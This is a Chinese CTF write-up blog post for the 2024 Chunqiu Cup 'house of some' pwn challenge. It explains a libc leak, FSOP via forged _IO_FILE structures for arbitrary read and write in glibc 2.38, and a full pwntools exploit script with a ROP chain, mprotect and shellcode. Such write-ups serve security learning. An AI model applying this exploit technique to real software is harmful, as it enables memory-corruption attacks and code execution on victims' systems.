春秋杯2024 house of some

已于 2024-01-26 22:54:24 修改
阅读量451 收藏 7
点赞数 12
文章标签: python 安全 网络安全
于 2024-01-26 22:46:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62172019/article/details/135875602
版权
本文介绍了如何利用IDA工具分析程序,通过控制/dev/urandom设备实现内存操作,利用IO_list_all中的漏洞进行任意读写,解决内存泄露问题并利用ROP执行shellcode获取flag。解题过程中涉及到了内存分配、设备驱动和漏洞利用技巧。
摘要由CSDN通过智能技术生成

IDA分析

name函数
在这里插入图片描述
dev函数
在这里插入图片描述
fopen函数会在打开设备以后会在_IO_list_all_插入新的IO结构,这一点在后面会用到。/dev/zero设备是用于生成空字符的设备,/dev/urandom是用于生成随机数的设备,另一个则是相当于回收站一样丢弃所有输入进来的流。本题用到第二个设备。
在这里插入图片描述
draw函数本质上是在任意的地址进行1字节的置零。
在这里插入图片描述
在菜单函数这里显然有一个未初始化的变量v4由于getint使用了scanf,"%lld"接收数据在遇到’-'时不会覆盖栈上的数据又由于下面会打印出栈上的值存在一个泄露问题。泄露出来的地址是stdout的地址。选项5使用了exit函数也在提醒我们可以使用
FSOP。

手法引入

在这里插入图片描述
题目贴心的为我们展示了库的补丁显示_wide_data已经加上check了提示apple2不好使了。所以这题可以使用house of some(为一个手法出一道题,真的 我哭死。。)
先把手法的调用链放在下面

read
_IO_flush_all
 _IO_file_finish 
  _IO_do_write
   _IO_file_read
    read
write
_IO_flush_all 
 _IO_file_overflow
   _IO_do_write
    _IO_file_write
     write

read的三个参数分别对应 fileno->fd writebase->buf end-base->size
write同理。
下面是任意读和任意写的模板。

write_io = (p64(0x8000 | 0x800 | 0x1000)flag+ p64(0) * 3 + p64(stack) + p64(stack + 0x80) + p64(0) * 7 + p64(addr + len(p64(0) * 28)) + p64(1) + p64(0) * 2 + p64(0) + p64(0) * 9 +  p64(io_file_jumps)) 
read_io = p64(0x8000 | 0x40 | 0x1000) + p64(0) * 3 + p64(addr) + p64(addr + 0x600) + p64(0) * 7 + p64(addr) + p64(0) * 3 + p64(un) + p64(0) * 9 + p64(io_file_jumps - 0x8)
解释:
write
0x0:  0x8000 | 0x800 | 0x1000, #_flags
0x20: _IO_write_base#要泄露的起始地址
0x28: _IO_write_ptr#终止地址
0x68: _chain
0x70: _fileno#1
0x78: lock#
0xc0: _modes
0xd8: _IO_file_jumps, #_vtables
read
0x0:  0x8000 | 0x40 | 0x1000, #_flags
0x20: _IO_write_base#要输入的起始地址
0x28: _IO_write_ptr#终止地址
0x68: _chain
0x70: _fileno#0
0x78: lock#取stdout的对应的值就行
0xc0: _modes
0xd8: _IO_file_jumps - 0x8, #_vtables

既然可以任意写了只有有可控地址就可以将新的fake_io插入到list中从而循环任意读任意写。
知道有这个手法了解题就很轻松了。

解题思路

首先输入" - "泄露出libc的地址。
申请大小合适的堆块将任意写fake_io放到堆上。
然后利用dev函数将一个堆地址推到_IO_list_all_链表上面。
利用draw函数随意一字节置零的特性将新插入的结构体地址改小到可控范围。
第一次利用写在114514上面写入新的任意读fake_io1和fake_io2,同时这个fake_io1的chain成员应该是一个任意写的fake_io2方便循环利用。
读出任意函数的返回地址所在的栈的地址。
使用刚刚布置fake_io2的任意写在114514写下fake_io3任意写。
最后使用fake_io3向栈中写入rop读取flag(本题开启了沙箱机制只能使用orw读取flag)
解题代码

from pwn import*
context.arch = 'amd64'
def gd():
 gdb.attach(p)
 pause()

def add(size,data):
 p.recvuntil(b'> ')
 p.sendline(b'1')
 p.recvuntil(b'> ')
 p.sendline(str(size).encode())
 p.recvuntil(b'> ')
 p.sendline(data)   
def draw(o):
 p.recvuntil(b'> ')
 p.sendline(b'3')
 p.recvuntil(b'> ')
 p.sendline(str(o).encode())
 p.recvuntil(b'> ')
 p.sendline(b'1') 
def dev(s):
 p.recvuntil(b'> ')
 p.sendline(b'2')
 p.recvuntil(b'> ')
 p.sendline(str(s).encode()) 
def exit():
 p.recvuntil(b'> ')
 p.sendline(b'5')
def show():
 p.recvuntil(b'> ')
 p.sendline(b'4')
p = process("./pwn")
libc = ELF("/home/cforce/Desktop/pwn_tools/glibc-all-in-one-master/libs/2.38-1ubuntu6_amd64/libc.so.6")
p.sendline(b'-')
p.recvuntil(b'invalid option ')
libc_base = int(p.recv(15),10)-0x1ff7a0
io_list = libc_base + libc.sym['_IO_list_all'] - 0x114514000
addr = 0x114514000
print(hex(libc_base + libc.sym['_IO_list_all']))
read_io = 1
io_file_jumps = libc_base + libc.sym['_IO_file_jumps']
un = libc_base + 0x2008f0
stack = libc_base + libc.sym['environ']
mprotect = libc_base + libc.sym['mprotect']
pop_rdi = libc_base + 0x0000000000028715
pop_rsi = libc_base + 0x000000000002a671
pop_rdx_bx = libc_base + 0x0000000000093359
add(0x240,b'a' * 0x160 + p64(0x8000 | 0x40 | 0x1000) + p64(0) * 3 + p64(addr) + p64(addr + 0x600) + p64(0) * 7 + p64(addr) + p64(0) * 3 + p64(un) + p64(0) * 9 + p64(io_file_jumps - 0x8))
dev(2)
draw(io_list)
print(hex(io_file_jumps))
write_io = (p64(0x8000 | 0x800 | 0x1000) + p64(0) * 3 + p64(stack) + p64(stack + 0x80) + p64(0) * 7 + p64(addr + len(p64(0) * 28)) + p64(1) + p64(0) * 2 + p64(0) + p64(0) * 9 +  p64(io_file_jumps)) 
read_io = p64(0x8000 | 0x40 | 0x1000) + p64(0) * 3 + p64(addr) + p64(addr + 0x600) + p64(0) * 7 + p64(addr) + p64(0) * 3 + p64(un) + p64(0) * 9 + p64(io_file_jumps - 0x8)
write_io += read_io

p.sendline(b'5')
p.sendline(write_io)
p.recvuntil(b'> ')

stack = u64(p.recv(6).ljust(8,b'\x00')) - 0x290
read_io1 = p64(0x8000 | 0x40 | 0x1000) + p64(0) * 3 + p64(stack) + p64(stack + 0x600) + p64(0) * 7 + p64(addr) + p64(0) * 3 + p64(un) + p64(0) * 9 + p64(io_file_jumps - 0x8)
shellcode = asm(shellcraft.amd64.linux.cat2("flag",1,0x30))
print(hex(stack))
p.sendline(read_io1)
#gd()
p.sendline(p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(addr) + p64(pop_rdx_bx) + p64(0x100) + p64(0) + p64(libc_base + libc.sym['read']) + p64(pop_rdi) + p64(addr) + p64(pop_rsi) + p64(0x1000) + p64(pop_rdx_bx) + p64(7) + p64(0) + p64(mprotect) + p64(addr))
p.sendline(shellcode)
p.interactive()

成功读出flag
在这里插入图片描述

萌の鱼
关注
大学英语综合教程二 Unit 1 到Unit 8 课文内容英译中 中英翻译
亓官劼的博客
04-27 3万+
大学英语综合教程二 Unit 1 到Unit 8课文内容英译中 中英翻译   大家好,我叫亓官劼(qí guān jié ),在CSDN中记录学习的点滴历程,时光荏苒,未来可期,加油~博客地址为:亓官劼的博客 本文原创为亓官劼,请大家支持原创,部分平台一直在盗取博主的文章!!! 博主目前仅在CSDN中写博客,唯一博客更新的地址为:亓官劼的博客 文本为博主整理翻译所得,送给...
pwn入门小技巧
qq_36918532的博客
05-24 2814
目前我所遇到的一些pwn的做题技巧 我也是偶尔玩玩ctf,所以也不会很难的,所以这篇主要是帮助刚开始学习的人学习吧 首先知识点包括:栈,堆,整数溢出,格式化字符串 目前ctf的题越来越偏向于实际,有的会使用刚刚爆出来的CVE漏洞的,所以不能只局限于glibc 所以可以大体分为两类把:libc,kernel 栈利用:有ret2libc,ret2shellcode,ret2text,ropchain,ret2syscall,brop,srop等等,当然有时候还会有seccomp的只能使用ORW系统调用 堆利用:
我的CET-6准备之路(每天更新中...)
蜡笔小新的博客
10-19 2382
第一部分:精选段落翻译(1) 中国传统元素 Traditional Chinese elements refer to the widely recognized traditional Chinese images,symbols or customs etc. 中国传统元素是指被广泛认可的中国传统形象、符号或风俗习惯等。 They can reflect the es
为什么中国长期在科学领域少有重大建树 -关于钱学森之问 的回答
立身以力学为先,力学以读书为本。 —郑耕老《劝学》
01-11 3014
参考文献以后还有材料,欢迎阅读。 如果读者喜欢,欢迎微信读者转发到朋友圈/或群。也欢迎用e-mail 抄送好友阅读。 本文更适合在电脑上阅读 English Version: Part III Why China is currently underperforming in medical innovation and what C.pdf 为什
house of banana .pdf
09-05
House of Banana:深入理解安全实践与堆利用技术》 在信息安全领域,攻击者不断寻找新的漏洞和利用手段,以突破系统防御。"House of Banana"是一种针对glibc库的新型堆利用技术,自glibc 2.28版本以来,由于其...
2.27 house of botcake例题附件
05-31
2.27 house of botcake例题附件
House of apple 一种新的glibc中IO攻击方法.doc
07-09
House of Apple - 一种新的 glibc 中 IO 攻击方法 本文提出了一种新的 glibc 中 IO 攻击方法,名为 House of Apple,该方法可以在高版本 glibc 中成功实施 IO 攻击。该方法基于对 IO_FILE 结构体的伪造和 IO 流的...
House of Fun Free Coins-crx插件
04-06
House of Fun免费硬币将帮助您获得免费硬币和House of Fun的免费旋转。 我们将使用我们的秘密方法为您的帐户生成硬币。 House of Fun免费硬币是在网上免费获得Fun Spins和硬币的最佳方法。 代币大师旁边最受欢迎的...
house of pig 攻击手法详解
weixin_46483787的博客
02-03 1620
在这里学习一下学长提出来的一种攻击手段,适用与libc-2.31及以上版本,本质上是通过 libc2.31 下的 largebin attack以及 FILE 结构利用,来配合 libc2.31 下的 tcache stashing unlink attack 进行组合利用的方法。主要适用于程序中仅有 calloc 函数来申请 chunk,而没有调用 malloc 函数的情况。
Python办公自动化案例(二):对比两个Excel数据内容并标出不同
衍生星球的博客
09-14 144
在数据处理和分析的日常工作中,我们经常需要比较两个Excel文件的差异。这可能是为了验证数据的一致性、检查数据的准确性,或者在版本控制中追踪更改。手动比较这些文件不仅耗时,而且容易出错。幸运的是,Python的openpyxl库提供了一种自动化这一过程的方法。
蒙特卡罗方法——布丰投针实验近似计算圆周率python代码实现
2301_79376014的博客
09-09 515
蒙特卡罗——布丰实验
Python实现多线程、多进程及协程
qq_42568323的博客
09-09 1104
本文详细介绍了 Python 中多线程、多进程和协程的并发模型及其实现方式,并通过具体场景演示了如何使用面向对象思想实现这些模型。在实际应用中,应根据任务的类型和需求选择合适的并发模型,从而优化程序的性能和资源利用率。本文将详细介绍 Python 中的多线程、多进程和协程的概念及其实现方式,并通过具体场景展示如何在 Python 中使用面向对象的思想实现这些并发模型。接下来,我们通过一个计算密集型任务的示例来演示多进程的实现:计算一系列大数字的阶乘。主程序中创建并启动了多个计算进程,并使用。
Python——俄罗斯方块
最新发布
2302_81225694的博客
09-14 226
这段代码使用了Pygame库来实现游戏的图形界面,通过键盘控制方块的移动和旋转。游戏循环不断更新方块的位置和网格状态,并绘制在屏幕上。在方块达到底部或无法继续移动时,判断是否有满行,并清除满行的方块。游戏会根据方块的状态和移动情况不断更新,直到无法继续下落为止,游戏结束。俄罗斯方块游戏是一款经典的益智游戏,通常使用编程语言Python来实现。请注意,这只是一个简单的示例,可能还有一些功能和优化方面的改进。您可以根据自己的需求进行修改和扩展。
JIT编译器
Flying_Fish_roe的博客
09-11 564
JIT(Just-In-Time,实时编译)编译器是 Java 虚拟机(JVM)中的一项重要技术,用于将 Java 字节码(Bytecode)在运行时动态编译为机器码。Java 程序最初通过编译器(如javac)将源代码编译为字节码,字节码在 JVM 中解释执行。然而,由于解释执行每次都需要逐条翻译字节码指令为机器指令,这种方式效率较低。为了解决性能问题,JIT 编译器在程序运行时将热点代码编译为机器码,从而提高运行效率。JIT 编译器是 Java“编译型”和“解释型”语言的结合特性的重要体现之一。
Python 检测人脸筛选指定尺寸人脸图片
刚刚入门的小码农
09-09 684
主要功能是处理一个指定文件夹中的所有图像文件(.jpg和.png),并根据图像中检测到的人脸特征,筛选和移动符合条件的图像。
python-游戏自动化(二)(OpenCV图像运用基础)
qiqi776532的博客
09-11 1089
图像二值化可以简单理解成,就是把图像转换成黑白两种颜色(一般用于提取图像特征),二值化图像:只有两种颜色,黑和白,255白色,0黑色。结合前面学习的彩色图像和灰度图像,一起来做个对比。彩色图像:三个通道0-255,0-255,0-255,所以可以有2^24位空间灰度图像:一个通道0-255,所以有256种颜色二值图像:只有两种颜色,黑和白,255白色,0黑色图像匹配,就是从一个图像中找出想要的小图像,打个比方:就好比拿着老师的头像寸照,然后去师的大学毕业照里面一个个的头像对照然后将老师找出来。
JS笔记
2201_76100326的博客
09-11 872
javascript中的对象分为3种:自定义对象,内置对象,浏览器对象 JavaScript 中的所有事物都是对象:字符串、数字、数组、日期,等等。在 JavaScript 中,对象是拥有属性和方法的数据。属性是与对象相关的值。方法是能够在对象上执行的动作。.关键词()
pip 阿里云镜像报错 certificate verify failed: unable to get local issuer certificate
m0_74253823的博客
09-10 447
在没有管理员身份,且有防火墙限制的电脑上,pip安装​python库包失败。​但是在普通的电脑上安装正常。​解决方案:本地电脑上信任宿主主机trusted-host。
堆漏洞深入解析:House of Spirit与House of Lore
"这篇文档是关于堆漏洞分析的‘house系列’第一部分,主要讨论了House of Spirit和House of Lore两种技术。文章基于CentOS 6.10 32位系统,内核版本2.6.32,gcc 4.4.7,gdb 7.2和libc 2.12。作者提到了先前关于glibc...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值